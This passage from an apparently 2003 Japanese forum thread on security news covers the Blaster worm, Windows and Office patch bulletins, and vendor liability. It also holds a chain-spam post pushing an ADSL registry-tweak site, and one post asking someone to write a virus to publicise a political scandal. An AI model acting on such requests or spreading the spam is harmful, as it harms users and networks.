次は逸見がいいな、、、、
673名無しさん@お腹いっぱい。:03/08/29 08:26 ID:snn5Nml3
>>632
WindowsUpdate機能って必要だけれど、ネットにあまり、または全くつなげないPCには
使い物にならない機能ですよね。
ネットにつなげなくても、フロッピーやMOもしくはCD-Rとかの移動媒体で感染しますから。
M$はネットではもちろん、アップデート毎に登録者全員に、CD-RWかDVD-RAMで、
フルパッチしたWindows本体と差分ファイルを配るべきだと思う。
CD-RWとかがみそね。必要なくなったら消して再利用できるところが環境にやさしい
:-P
674名無しさん@お腹いっぱい。:03/08/29 13:37 ID:bJtmVorD
j
675名無しさん@お腹いっぱい。:03/08/29 15:42 ID:6hg5AMbn
店頭で配ってるらしいBlasterワーム対策CDを手に入れた人居る?
676高速化:03/08/29 15:47 ID:Hi9A3UaO
      ■ADSL回線速度向上サイト■

Windows95, 98, Me は、ダイアルアップに最適化されています。
これでは、ADSLでの速度を向上させることはできません。
ADSL最適化ソフトは市販されていますが、実はレジストリーの設定などで
簡単に行うことができるんです。
百聞は一見にしかず、まずは、やってみて下さい。
簡単に元の設定に戻せますので。

勿論、WindowsXP でも最適化できますし、市販のソフトを購入しても、
効果が現れなかった方も、試してみてください。

−−−−−−−−−−−−−−−−−−−−−−−−−
  完全無料で高速化!  まずは、試してみよう!
http://kadsl.fc2web.com/
−−−−−−−−−−−−−−−−−−−−−−−−−

※この記事はコピペした物です。
※効果があったら他の板にもコピペしてください。
※勿論、試す前にコピペしても構いません
677名無しさん@お腹いっぱい。:03/08/29 17:25 ID:6CeaoAxo
野中の元秘書口利き5千万醜聞発覚を、テレビなどのマスメディアが全く報道しない、北朝鮮のような現状をどう思いますか?
誰か、野中の犯罪を日本中に広めるウィルスを作ってくれませんか?

★野中窮地!元秘書口利き5千万醜聞発覚
 反小泉勢力スキャンダル連発、倒閣戦略に暗雲

・9月20日投票の自民党総裁選をにらみ、小泉純一郎首相の再選阻止の急先鋒
 にいる橋本派幹部で抵抗勢力のドン、野中広務元幹事長を突如、スキャンダルが
 直撃した。元秘書官が巨額手形詐欺事件の関連会社から計5000万円余もの
 資金提供を受けていたもので大打撃は避けられない。

 「信頼して秘書にしたのに。知らなかった。情けない…」。「影の宰相」とまで
 言われた野中氏は21日までに、報道機関の取材にこう答えた。
 関係者によると、野中氏が自治相や官房長官当時に秘書官を務めた加藤芳輝
 元秘書(47)が、総合商社「ニチメン」巨額手形詐欺事件の被告が会長だった
 電子機器メーカーやゼネコンから計5000万円余の提供を受け、見返りに国の
 融資保証をめぐり通産省幹部と面会させていたという。

 政界実力者の威光をバックに、秘書が自らのカネ集めに奔走する永田町の
 あきれた実態が白日の下にさらされたわけで、「打倒小泉」を掲げて秘策を練る
 野中氏の打撃は計り知れない。(一部略)
 http://www.zakzak.co.jp/top/top0821_1_07.html
678名無しさん@お腹いっぱい。:03/08/29 21:46 ID:E1NJmJz9
今日会社の人間が対策CD貰ってきてたみたい
大き目の封筒(?)に入ってたかな?
679名無しさん@お腹いっぱい。:03/08/29 23:12 ID:yOgnv1e7
今、Windows Updateって正常に動いてますか?
なんかエラーが出て先に進めない・・・
680名無しさん@お腹いっぱい。:03/08/29 23:18 ID:???
すみません。繋がりましたm(_)m
681名無しさん@お腹いっぱい。:03/08/29 23:51 ID:???
>>678 いいなー。地元の大手電器屋には無かった。(´・ω・`)ショボーン
いや、自分は大丈夫なんだけどド素人の友人に渡したい…
682名無しさん@お腹いっぱい。:03/08/30 05:10 ID:???
>M$はネットではもちろん、アップデート毎に登録者全員に、CD-RWかDVD-RAMで、
>フルパッチしたWindows本体と差分ファイルを配るべきだと思う。

つうか、97〜98年頃のIE3や4の頃のNT4用のサービスパックや、IEやネスケのような「大物」は、
まだ定額常時接続の手段もほとんど無く、夜間のテレホーダイの時間帯で落とすのも
結構しんどかったため、PC雑誌の付録CDに収録されるのを待ってたりしたもんだけど。

その頃やそれ以前は、BSDやLinuxもISOイメージを落としてCDに焼くなんて個人じゃ夢物語で、
学校や職場で落としてCDに焼いたりMOに分割して持ち帰ったりするか、
そういうツテもない香具師は最低限のパッケージだけ落として自分でインスコしてたもんだ…
683名無しさん@お腹いっぱい。:03/08/30 06:30 ID:???
再インストールした時って、WindowsUpdateしてる間に穴つつかれるよね?
684名無しさん@お腹いっぱい。:03/08/30 13:42 ID:???
>再インストールした時って、WindowsUpdateしてる間に穴つつかれるよね?

ルータ持っててport135を塞いであるか、設定で余計なポート全部閉じれば大丈夫。
何も対策してなければ、updateしてる間に喰らうよ。

まあ、事前にパッチを落としておく余裕があるなら、落としておいた方がいいのは確か。
Win2KならSP4もね。
685名無しさん@お腹いっぱい。:03/08/30 15:35 ID:???
>>682
OSに興味あって、自分で色々できる人はいいけれど、
ワープロ代わりにしか使ってなくて、原稿送るのにメールをたまに使う人間なんて、
雑誌までチェックしないよねぇ。
そういうユーザーに、提供企業がちゃんと情報を伝達するのは義務だと思う。
ただでさえバグ入りプログラムであっても責任は負わないってスタンスを
取ってるんだもの。バグが捕れないのは宿命だとしても、その修正を
提供していくことはできるでしょ。とくにパソコンの根源にかかわるOSであり
それで世界NO1のシェアになっているM$は当然、修正製品を
個人に送ることは義務でしょう。


686名無しさん@お腹いっぱい。:03/08/30 16:44 ID:???
>>685
大体、契約書に「使わせてやるけど、後はどうなったって知らないよ」って感じのことが書いてあって、
それを了承して使ってるんだから、修正品を送るのは義務ではないと思う。
687名無しさん@お腹いっぱい。:03/08/30 17:17 ID:???
ソフトを作ったトコが不具合が判明した際にパッチ等不具合を修正する物を作り
それを公表する義務が有るのは当然だが
ソフト使用者にも保守を行う義務を負わせて良いのではないだろうか。
何か問題が起きた際に自分だけでなく他人も被害に巻き込まれる事考えると
危険物だって認識をもつべきなのかもしれない。
車だって定期点検しなくちゃならないわけだしね。

とまぁSobig.Fで集中攻撃を受けてメールボックスを潰された人のぼやきでした。
マジでウイルス送ってきた奴を訴えたい気分だ。
これはBlasterの突く穴とは関係ないけどさ。
688名無しさん@お腹いっぱい。:03/08/30 22:47 ID:???
なんかいつの間にか情報スレじゃなくて質問スレになってない?(^^;
689名無しさん@お腹いっぱい。:03/08/31 07:34 ID:???
情報提供の常連さんもアホくさくなってるだろうなぁ
690名無しさん@お腹いっぱい。:03/09/04 13:38 ID:BmqoAERQ
【Microsoft 製品に複数の脆弱性、うち1件は最大の深刻度評価】
  ttp://japan.internet.com/webtech/20030904/12.html

記事より抜粋。
第1の脆弱性は、『Microsoft Visual Basic for Applications』(VBA) が、
受け取るドキュメントプロパティを確認する方法に存在するもので、悪用
すればログインしているユーザーの権限で任意のプログラムコード実行
を招く恐れがあるという。深刻度は『緊急』です。

2件目は Word の脆弱性で、セキュリティ情報「MS03-035 (日本語概要)」
を公開し、深刻度を上から2番目の「重要」とした。

もう1件は『WordPerfect Converter』に存在するバッファオーバーランの
脆弱性で、セキュリティ情報「MS03-036 (日本語概要)」を公開し、こちら
も深刻度を「重要」とした。

Office Updateしましょう。
691名無しさん@お腹いっぱい。:03/09/04 23:04 ID:???
>>687
>ソフト使用者にも保守を行う義務を負わせて良いのではないだろうか。
>何か問題が起きた際に自分だけでなく他人も被害に巻き込まれる事考えると
>危険物だって認識をもつべきなのかもしれない。
>車だって定期点検しなくちゃならないわけだしね。

車と同じならば製造物責任、PL法が適用されるということ。
修正パッチだけじゃすまなくなるねぇ。
公表する義務どころか、欠陥扱いで賠償請求だ。
692窓板住人 ◆winDOwS0aE :03/09/04 23:05 ID:???
Microsoft Access Snapshot Viewer の未チェックのバッファにより、コードが実行される (827104) (MS03-038)
登録日 : 2003/09/04 更新日 : 2003/09/04
http://www.microsoft.com/japan/technet/security/bulletin/ms03-038.asp

このセキュリティ情報の対象となるユーザー : Microsoft Access またはダウンロード可能な
Microsoft Access Snapshot Viewer を使用しているお客様
脆弱性の影響 :攻撃者により、任意のコードが実行される可能性があります
最大深刻度 :警告
推奨する対応策 : Microsoft Access またはダウンロード可能な Microsoft Access Snapshot Viewer を
使用しているお客様はできる限り早期に修正プログラムをインストールして下さい。

修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。(略)
Microsoft Access 2002/2000の修正プログラムは Office アップデート からインストール
することもできます。
Office アップデートの利用方法については以下のサイトを参照してください。
http://www.microsoft.com/japan/security/square/guard/a04g41.asp
693名無しさん@お腹いっぱい。:03/09/04 23:05 ID:HnB0uelq
またかよ。
694 :03/09/04 23:06 ID:RX36juGI
695名無しさん@お腹いっぱい。:03/09/04 23:14 ID:q1vmii5r
>>691
でもまあ、そういう”認識”は持った方がいいってのはその通りかもね
それができるのは今の若い世代がオサーンになる頃だと思うけど
696窓板住人 ◆winDOwS0aE :03/09/04 23:17 ID:???
Visual Basic for Applications の問題により、任意のコードが実行される (822715) (MS03-037)
登録日 : 2003/09/04 更新日 : 2003/09/04
http://www.microsoft.com/japan/technet/security/bulletin/ms03-037.asp

絵でみるセキュリティ情報 :
イラストを交えたセキュリティ情報は次のサイトをご覧ください。
http://www.microsoft.com/japan/security/security_bulletins/ms03-037e.asp

影響を受けるソフトウェア :
Microsoft Visual Basic for Applications SDK 5.0
Microsoft Visual Basic for Applications SDK 6.0
Microsoft Visual Basic for Applications SDK 6.2
Microsoft Visual Basic for Applications SDK 6.3

影響を受けるソフトウェアを含む製品 :
Microsoft Access 97/2000/2002
Microsoft Excel 97/2000/2002
Microsoft PowerPoint 97/2000/2002
Microsoft Project 2000/2002
Microsoft Publisher 2002
Microsoft Visio 2000/2002
Microsoft Word 97/98 (日本語版)/2000/2002
Microsoft Works Suite 2001/2002/2003
(Microsoft Works Suite 2002 および 2003 は、英語版のみの製品です。)
Microsoft Business Solutions Great Plains 7.5
Microsoft Business Solutions Dynamics 6.0/7.0
Microsoft Business Solutions eEnterprise 6.0/7.0
Microsoft Business Solutions Solomon 4.5/5.0/5.5
(Microsoft Business Solutions は、英語版のみの製品です。)
697名無しさん@お腹いっぱい。:03/09/04 23:18 ID:???
あれ?週間WindowsUpdateの創刊はまだでしか?
698窓板住人 ◆winDOwS0aE :03/09/04 23:18 ID:???
深刻度 :
Microsoft Visual Basic for Applications SDK 5.0 緊急
Microsoft Visual Basic for Applications SDK 6.0 緊急
Microsoft Visual Basic for Applications SDK 6.2 緊急
Microsoft Visual Basic for Applications SDK 6.3 緊急

修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。(略)

注意事項: 適用する修正プログラムは、VBA を使用するアプリケーションのうち、どれを使用しているか
によって異なります。「よく寄せられる質問」の「この脆弱性に対する修正プログラムには多くの種類が
ありますが、どれをインストールする必要がありますか?」の質問を読み、適用する必要がある修正
プログラムのバージョンを確認することを強くお勧めします。(後述)

マイクロソフトは、Office Update の Web サイト
http://www.office.microsoft.com/japan/ProductUpdates/default.aspx を訪問し、Office ファミリー製品
にこのセキュリティ修正プログラムおよびほかのすべてのアップデートを検索し、インストールを行うことを
推奨します。 (注意 : Office Update では Office 97 または Visio 2000 はサポートされていません。)
Office アップデートの利用方法については以下のサイトを参照してください。
http://www.microsoft.com/japan/security/square/guard/a04g41.asp
699窓板住人 ◆winDOwS0aE :03/09/04 23:18 ID:???
修正プログラムに関する追加情報 : 対象プラットフォーム :(略)
この修正を含む予定のサービス パック : この問題に対する修正プログラムは Microsoft Office XP、
Microsoft Office 2000、Microsoft Project 2002、Microsoft Project 2000、Microsoft Visio 2002 用に
今後リリースされる Service Pack に含まれる予定です。
再起動の必要性 :インストール時に vbe.dll または vbe6.dll が使用されている場合、
インストール終了時に再起動する必要があります。
修正プログラムのアンインストール :不可
修正プログラムに含まれる過去の修正 : なし
修正プログラムが正しくインストールされたかどうか確認する方法 : (略)

詳細情報 :
よく寄せられる質問 : マイクロソフトセキュリティ情報(MS03-037)
http://www.microsoft.com/japan/technet/security/bulletin/fq03-037.asp
US マイクロソフトセキュリティ情報(MS03-037)
http://www.microsoft.com/technet/security/bulletin/ms03-037.asp
この脆弱性に対するサポート技術情報 (KB) は現在準備中です。

マイクロソフト セキュリティ情報 (MS03-037) : よく寄せられる質問
http://www.microsoft.com/japan/technet/security/bulletin/fq03-037.asp
700窓板住人 ◆winDOwS0aE :03/09/04 23:19 ID:???
Q.この脆弱性に対する修正プログラムには多くの種類がありますが、どれをインストールする必要がありますか?
A.この脆弱性に対する修正プログラムは、Microsoft VBA のバージョンおよび
使用しているホスト アプリケーションによって異なります。
・Microsoft VBA 用修正プログラム
以下のアプリケーションを使用している場合、Microsoft VBA 用の修正プログラムを
適用する必要があります。Microsoft VBA 5.0/6.0/6.2/6.3.
Microsoft Access 97
Microsoft Excel 97
Microsoft PowerPoint 97
Microsoft Word 97
Microsoft Word 98 (日本語版)
Microsoft Works 2001/2002
Microsoft Works Suite 2003
Microsoft Business Solutions Great Plains 7.5
Microsoft Business Solutions Dynamics 6.0/7.0
Microsoft Business Solutions eEnterprise 6.0/7.0
Microsoft Business Solutions Solomon 4.5/5.0/5.5

・Microsoft Project 2000、Microsoft Project 2002 および Microsoft Visio 用の修正プログラム :
Microsoft Project または Microsoft Visio を使用している場合、それらの製品向けの
修正プログラムを適用する必要があります。

・Microsoft Office 2000 and Microsoft Office XP 用の修正プログラム :
Microsoft Office 2000 または Microsoft Office XP (Publisher 2002 を含む) を使用している場合、
それらの製品向けの修正プログラムを適用する必要があります。
701窓板住人 ◆winDOwS0aE :03/09/04 23:20 ID:???
Q,上記の製品のうち、複数の製品を使用しています。それぞれの製品向けの
特定の修正プログラムを適用する必要がありますか?
A.はい。上記のそれぞれの製品向けの修正プログラムをすべて適用する必要が
あります。たとえば、Microsoft Office XP および Microsoft Visio 2000 を使用
している場合、Microsoft Office XP 向けの修正プログラムおよび Microsoft Visio
向けの修正プログラムの両方を適用する必要があります。

Q.使用している Microsoft VBA のバージョンはどのように確認することができますか?
A.VBA がコンピュータ上に存在するかどうかのチェック、また使用している VBA の
バージョンのチェックを行うには、以下のファイルのファイルバージョンを確認してください。
(C:\ は使用しているシステム ドライブとなります)
以下のファイルが存在する場合、VBA 5.0 を使用していることになります。
C:\Program Files\Common Files\Microsoft Shared\VBA\vbe.dll
以下のファイルが存在する場合、VBA 6.0 を使用していることになります。
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\vbe6.dll

Q.Microsoft VBA を使用するマイクロソフト以外の製品を使用しています。何をする必要がありますか?
A.マイクロソフトは Microsoft VBA を使用するアプリケーションの開発を行っているサード パーティと
協力し、このセキュリティ上の脆弱性について認識しているか、またそれらの製品に組み込む必要な
Microsoft VBA への更新を所有しているかを確認しました。ユーザーは、該当のソフトウェア製造業者に
連絡し、Microsoft VBA を使用するマイクロソフト以外のアプリケーションへのアップデートを入手する
必要があります。
702名無しさん@お腹いっぱい。:03/09/04 23:23 ID:HnB0uelq
>>695
ソフトウェアにPL法適用しようとしている政治団体などが、
あるみたいだから、そんなに遠い事じゃないかも。

それに今の若い人がオサーンになるころは、いん石で滅んでるかも:-P
703窓板住人 ◆winDOwS0aE :03/09/04 23:23 ID:???
WordPerfect コンバータのバッファオーバーランにより、コードが実行される (827103) (MS03-036)
登録日 : 2003/09/04 更新日 : 2003/09/04
http://www.microsoft.com/japan/technet/security/bulletin/ms03-036.asp

このセキュリティ情報の対象となるユーザー : MicrosoftR Office、Microsoft FrontPageR、
Microsoft Publisher または Microsoft Works Suite を使用しているお客様
脆弱性の影響 : 攻撃者の選択したコードが実行される可能性があります。
推奨する対応策 : 次の影響を受ける製品を使用しているお客様は可能な限り早期セキュリティ
修正プログラムを適用して下さい。

絵でみるセキュリティ情報 :
イラストを交えたセキュリティ情報は次のサイトをご覧ください。
http://www.microsoft.com/japan/security/security_bulletins/ms03-036e.asp
704窓板住人 ◆winDOwS0aE :03/09/04 23:23 ID:???
影響を受けるソフトウェア :
Microsoft Office 97/2000/XP
Microsoft Word 98 (日本語版)
Microsoft FrontPage 2000/2002
Microsoft Publisher 2000/2002
Microsoft Works Suite 2001/2002 (英語版)/(英語版)
(Works Suite 2002 および 2003 は、英語版のみの製品です。)

深刻度 :
Microsoft Office (すべてのバージョン) 重要
Microsoft FrontPage (すべてのバージョン) 重要
Microsoft Publisher (すべてのバージョン) 重要
Microsoft Works Suite (すべてのバージョン) 重要
705窓板住人 ◆winDOwS0aE :03/09/04 23:27 ID:???
修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。(略)
Office 97 および Word 98 (日本語版) の日本語版修正プログラムは現在準備中です。
準備が出来次第このページにてご案内いたします。

Office 製品のアップデート http://www.office.microsoft.com/japan/ProductUpdates/default.aspx
適切な修正プログラムおよび Office ファミリー製品に対するすべてのそのほかの公開された更新を見つけ、
インストールすることを推奨します。
(注 : Office Update は Office 97 および Visio 2000 をサポートしません。)
Office アップデートの利用方法については以下のサイトを参照してください。
http://www.microsoft.com/japan/security/square/guard/a04g41.asp

再起動の必要性 :なし
修正プログラムのアンインストール :不可
修正プログラムに含まれる過去の修正 :なし
修正プログラムが正しくインストールされたかどうか確認する方法 :(略)
706窓板住人 ◆winDOwS0aE :03/09/04 23:30 ID:???
Microsoft Word の問題により、マクロが自動的に実行される (827653) (MS03-035)
登録日 : 2003/09/04 更新日 : 2003/09/04
http://www.microsoft.com/japan/technet/security/bulletin/ms03-035.asp

このセキュリティ情報の対象となるユーザー :MicrosoftR Word を使用しているお客様
脆弱性の影響 :警告なしでマクロが実行される
推奨する対応策 : Microsoft Word の影響を受けるバージョンを使用しているお客様は
セキュリティ修正プログラムを直ちに適用して下さい。
イラストを交えたセキュリティ情報は次のサイトをご覧ください。
http://www.microsoft.com/japan/security/security_bulletins/ms03-035e.asp

影響を受けるソフトウェア :
Microsoft Word 97/98 (日本語版)/2000/2002
Microsoft Works Suite 2001/2002 (英語版)/2003 (英語版)
(Works Suite 2002 および 2003 は、英語版のみの製品です。)

深刻度 :
Microsoft Word (すべてのバージョン) 重要
Microsoft Works Suite (すべてのバージョン) 重要
707窓板住人 ◆winDOwS0aE :03/09/04 23:30 ID:???
修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。(略)
Microsoft Word 97 および Microsoft Word 98 (日本語版) の日本語版修正プログラムは現在準備中です。
準備が出来次第このページにてご案内いたします。

Office 製品のアップデート http://www.office.microsoft.com/japan/ProductUpdates/default.aspx
適切な修正プログラムおよび Office ファミリー製品に対するすべてのそのほかの公開された更新を見つけ、
インストールすることを推奨します。
(注 : Office Update は Office 97 および Visio 2000 をサポートしません。)
Microsoft Word 2000/2002 の修正プログラムは Office アップデート からインストールすることもできます。
Office アップデートの利用方法については以下のサイトを参照してください。
http://www.microsoft.com/japan/security/square/guard/a04g41.asp

再起動の必要性 : なし
修正プログラムのアンインストール : 不可
修正プログラムに含まれる過去の修正 : なし
修正プログラムが正しくインストールされたかどうか確認する方法 : (略)
708窓板住人 ◆winDOwS0aE :03/09/04 23:33 ID:???
NetBIOS の問題により、情報が漏えいする (824105) (MS03-034)
登録日 : 2003/09/04 更新日 : 2003/09/04
http://www.microsoft.com/japan/technet/security/bulletin/ms03-034.asp

このセキュリティ情報の対象となるユーザー : MicrosoftR WindowsR をご使用のお客様
脆弱性の影響 : 情報の漏えい
推奨する対応策 : ユーザーは、影響を受けるコンピュータにこのセキュリティ修正プログラムを
適用するかどうかを評価してください。
イラストを交えたセキュリティ情報は次のサイトをご覧ください。
http://www.microsoft.com/japan/security/security_bulletins/ms03-034e.asp

影響を受けるソフトウェア :
Microsoft Windows NT Server 4.0R
Microsoft Windows NT Server 4.0, Terminal Server Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server? 2003

影響を受けないソフトウェア :
Microsoft Windows Millennium Edition
709窓板住人 ◆winDOwS0aE :03/09/04 23:33 ID:???
深刻度 :
Windows NT 4.0 Server 注意
Windows NT 4.0, Terminal Server Edition 注意
Windows 2000 注意
Windows XP 注意
Windows Server 2003 注意

修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。(略)
Windows NT Server 4.0, Terminal Server Edition (PC/AT 互換機) 以外の修正プログラムは
Windows Update からインストールすることもできます。

再起動の必要性 : あり
修正プログラムのアンインストール : 可
修正プログラムに含まれる過去の修正 : なし
修正プログラムが正しくインストールされたかどうか確認する方法 :(略)
710窓板住人 ◆winDOwS0aE :03/09/04 23:49 ID:???
>>691 PL法の構成要件として、
製造物、しかもソフトウェアのような無体物ではないものの欠陥によって発生し
かつ、製造物の安全性に係わるような損害が生じていることが必要なのよね。
しかも欠陥による被害が,その製造物自体の損害にとどまった場合であれば
対象にならない。
711窓板住人 ◆winDOwS0aE :03/09/04 23:53 ID:???
なお、>>690 = >>692 >>696 >>698-701 >>703-707ですので念のため。
>>708-709>>690の記事以外の問題です。
712名無しさん@お腹いっぱい。:03/09/05 00:15 ID:7/R0lRoX
小泉「しかし、あれですな。改革改革と言ってれば阿呆な国民は支持してくれるんだから楽なもんですよ」
亀井「親小泉と抵抗勢力の対決構図を煽った甲斐があったってもんだよな」
青木「そうだわな」
古賀「単純な奴らですよね」
野中「私と青木君が対立してるなんてマスコミの報道は笑っちゃうよ。あとは粛々と詰めの作業を行うだけだな」
小泉「そうですね。あともう少しですよ」
江藤「ここまで来るのに苦労したが、これで我が党は安泰だな」
橋本「我が派も安泰ですよ」
森 「どうだ小泉君、今度の選挙もいけそうか」
小泉「任せてください。今回も圧勝しますよ。俺が何言っても支持しますからね、あいつらは」
野中「君もワルよのお。小泉君」
小泉「いえいえ。野中さんほどではありませんよ。フッフッフ」
青木「だわな」
一同「フッフッフッフ。アッハッハッハッハッハッハッハッ」
713名無しさん@お腹いっぱい。:03/09/05 00:26 ID:???
>>710
それは現行の法であって、PL法適用の解釈を広げてソフトにかけようって
動きがあるってことで。
べつにPL法をソフトにかけよう運動家じゃないんで、これ以上の話は
その手の方と、言うことで。
714名無しさん@お腹いっぱい。:03/09/05 00:28 ID:???
あーあ、またかめんどいなぁ。
なんかもっといいパソコンってないの?
ワープロとエクセルとホームページとメール見れればOK。
715名無しさん@お腹いっぱい。:03/09/05 01:19 ID:???
winぱっちまんどくせ。
いいじゃんセキュリティなんて。アプリつかえりゃ。
どうせ、秘密なんてねーし。
716名無しさん@お腹いっぱい。:03/09/05 08:18 ID:???
>715
そーゆー考えをしている人のPCが踏み台にされて
あちこちに迷惑かけるのです。

と、マジレスしてみる。
717名無しさん@お腹いっぱい。:03/09/05 09:39 ID:vdrkgjdk
なんか昨日のアップデート後、異常に重くなった
(しばしばメモリ不足になる)のだが・・・
718名無しさん@お腹いっぱい。:03/09/05 10:16 ID:???
ここは 【セキュリティ情報総合スレッド】

雑談程度のレスするなよ・・これだから2ちゃんねらは
719名無しさん@お腹いっぱい。:03/09/05 10:45 ID:4dJZEHrr
今度のパッチは何なの?
720名無しさん@お腹いっぱい。:03/09/05 13:29 ID:???
>>718
おまえモナー
と、言ってみたかった。
721名無しさん@お腹いっぱい。:03/09/05 13:30 ID:???
ぶっちゃけ、どうなの。
今回、何すりゃいいの?
722名無しさん@お腹いっぱい。:03/09/05 14:01 ID:???
最初期のoffice97なんで、office97用パッチ落としたけど、
当てようとしたら「古いバージョンにはインスコできません」とゆわれた。
もうサポート外らしいんでofficeごとアンインスコ。
office系のファイルもらったらIEとか自在眼で見ればいいや…。
723名無しさん@お腹いっぱい。:03/09/05 14:15 ID:LiJWX0TO
VBがだめってことは、VB使ってるフリーソフト等もまるごとだめってことでしょうか?
724名無しさん@お腹いっぱい。:03/09/05 14:16 ID:???
私はウイルスです
725名無しさん@お腹いっぱい。:03/09/05 15:28 ID:???
>>697
> あれ?週間WindowsUpdateの創刊はまだでしか?

もう冗談抜きでディアゴスティーニに頼みたい。
引越で当分ナローなんだよこっちは!>MS
726名無しさん@お腹いっぱい。:03/09/05 16:59 ID:???
>>714
Lindowsとか。
無料でM$ Office互換のOpenOfficeも使えるし、これにでもしとけ。

------------------------------------------------------
つーことで、このスレの「情報」の濃度が下がってうざいので、
以下、雑談系は然るべきスレでやること。
727名無しさん@お腹いっぱい。:03/09/05 17:28 ID:???
窓板氏乙!
むむむ氏はどこに行ったんだろ
728名無しさん@お腹いっぱい。:03/09/05 18:07 ID:IboRJoA5
スレ違いだったらごめんなさい。
どこで聞いたらいいか分からないもので・・・。
突然、「シャットダウンします」と出て
再起動してしまいます。
今、流行っているウィルスみたいですが
駆除の仕方が分かりません。
PCに入っているウィルススキャンをしても
ひっかからないのですが、このウィルスは
そういうものなのですか?
どなたかご存知の方がいらしたら教えてください。
729d206.GsizuokaFL2.vectant.ne.jp:03/09/05 18:10 ID:h/z2sLrA
730名無しさん@お腹いっぱい。:03/09/05 20:36 ID:???
>>723
べつんところで聞いてみます。
731窓板住人 ◆winDOwS0aE :03/09/05 20:46 ID:???
>>723
Q.Microsoft VBA とは何ですか?
A.Microsoft VBA はクライアント デスクトップ パッケージのアプリケーションの開発および
既存のデータやシステムにそれらを統合するための開発技術です。Microsoft VBA は
Microsoft Visual Basic 開発システムを基本にしています。Microsoft VBA は プロジェクト
ウインドウ、プロパティ ウインドウおよびデバッグ ツールなど、Microsoft Visual Basic を
使用する開発者に一般的に使用される同じ要素を特徴づける統合開発環境 (IDE) を提供します。
また、Microsoft VBA には、カスタム ダイアログ ボックスを作成する Microsoft フォーム、
ユーザー インターフェイスを構築するための ActiveXR コントロールも含まれます。
VBA は直接ホスト アプリケーションに統合されます。VBA を含むソフトウェア プログラムは、
カスタマイズ アプリケーション (特定のビジネス ニーズに合わせて作成することができる
アプリケーション) と呼ばれています。Microsoft Office は Microsoft VBA が組み込まれる
多くのアプリケーションのうちの 1 つで、ユーザーは Microsoft Office を基にカスタム
アプリケーションを開発することができます。Microsoft VBA が組み込まれているマイクロソフト
以外のアプリケーションもあります。

>>727 むむむ氏はご職業が多忙な方らしいですよ。私が暇って訳じゃないですが。

>>729
コンピュータウイルス関係総合質問スレッド
http://pc2.2ch.net/test/read.cgi/pcqa/1061572290/l50
732名無しさん@お腹いっぱい。:03/09/06 08:05 ID:???
それにしてもOffice Updateのめんどくせーったらねーな。
何回CD-ROM入れ替えさせるんだか。

しかも、CD-ROM入れ替えのダイアログが全面に出てこないのも
不便だったな。
733窓板住人@携帯:03/09/06 18:11 ID:???
>>732 diskに余裕がある人はcdの中身をまるごとコピーして そこからセットアップすると挿入要求出なくて楽ですよ 後からコピーしてもレジストリかどこかの書き換えをすると可能だったような。
734窓板住人@携帯:03/09/06 18:11 ID:???
>>732 diskに余裕がある人はcdの中身をまるごとコピーして
そこからセットアップすると挿入要求出なくて楽ですよ
後からコピーしてもレジストリかどこかの書き換えをすると可能だったような。
735窓板住人@携帯:03/09/06 18:11 ID:???
>>732 diskに余裕がある人はcdの中身をまるごとコピーして
そこからセットアップすると挿入要求出なくて楽ですよ
後からコピーしてもレジストリかどこかの書き換えをすると可能だったような。
736窓板住人 ◆winDOwS0aE :03/09/06 19:34 ID:???
>>733-735 スマソ、、、(;´Д`)
737名無しさん@お腹いっぱい。:03/09/07 01:41 ID:???
ちょっとおもしろかったりする
738名無しさん@お腹いっぱい。:03/09/07 11:05 ID:???
窓板氏乙です
739記者風野郎 ◆keO78YJbfs :03/09/08 17:25 ID:???

米MS、とんだお粗末-重大な脆弱性用のパッチが役立たず
http://japan.cnet.com/news/ent/story/0,2000047623,20060815,00.htm

>セキュリティの専門家によると、Internet Explorerのなかに発見された重要な脆弱性を修正するために、
>米Microsoftがリリースしたパッチが、実は機能しないという。

  _, ._
( ゚ Д゚)
740名無しさん@お腹いっぱい。:03/09/11 13:07 ID:???
MS03-039 に関する情報
「MS03-039: RPCSS サービスのバッファ オーバーランによりコードが実行され
る (824146)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。


概要
====
この問題は、下記製品に含まれる未チェックのバッファにより、不正な
プログラムが実行される可能性がある問題です。最悪の場合、悪意のある
ユーザーにお客様のコンピュータ上で任意のプログラムが実行される可能性が
あります。

対象となる製品
==============
・Microsoft Windows NT Workstation 4.0
・Microsoft Windows NT Server 4.0
・Microsoft Windows NT Server 4.0, Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP
・Microsoft Windows Server 2003

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/MS03-039ov.asp
741窓板住人 ◆winDOwS0aE :03/09/14 15:30 ID:???
Windows XP Service Pack 1 適用のお願い
- Windows XP 初期出荷版(SP1 未適用製品)向け修正プログラム提供終了のお知らせ
更新日: 2003 年 9 月 12 日
http://www.microsoft.com/japan/windowsxp/endofgold.asp

弊社製品に対する製品サポートの提供期間、および提供内容の基本的な方針をまとめた
ガイドライン「デスクトップ Windows 製品のライフサイクルガイドライン
(http://www.microsoft.com/japan/windows/lifecycle.asp)」に基づき、2003 年 9 月 4 日以降は
Service Pack 1 を適用した Windows XP のみ、修正プログラム(ホットフィックスサポート)の
対象とさせていただきます。

Windows XP 初期出荷版(SP1 未適用製品)をご利用のお客様につきましては、新しい修正
プログラムの提供を終了させていただきますが、製品に関するお問い合わせを含むその他の
製品サポート(無償・有償)は、引き続きご利用頂く事ができます。また、Service Pack 1 を含む
2003 年 9 月 3 日までに公開済みの修正プログラムは入手可能であり、Windows Update も
引き続きご利用頂く事ができます。
742窓板住人 ◆winDOwS0aE :03/09/14 15:38 ID:???
Office Update を実行すると必要に応じて Office Update 用の ActiveX コントロールの
更新が促されるが、古い ActiveX コントロールが proxy サーバなどに cache されていると
この更新がうまくいかず、結果として Office Update に失敗する場合がある場合の対策
(http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/09.html#20030905_MS03-037 より)

その1 http://memo.st.ryukoku.ac.jp/archive/200309.month/6368.html
その2 http://memo.st.ryukoku.ac.jp/archive/200309.month/6369.html
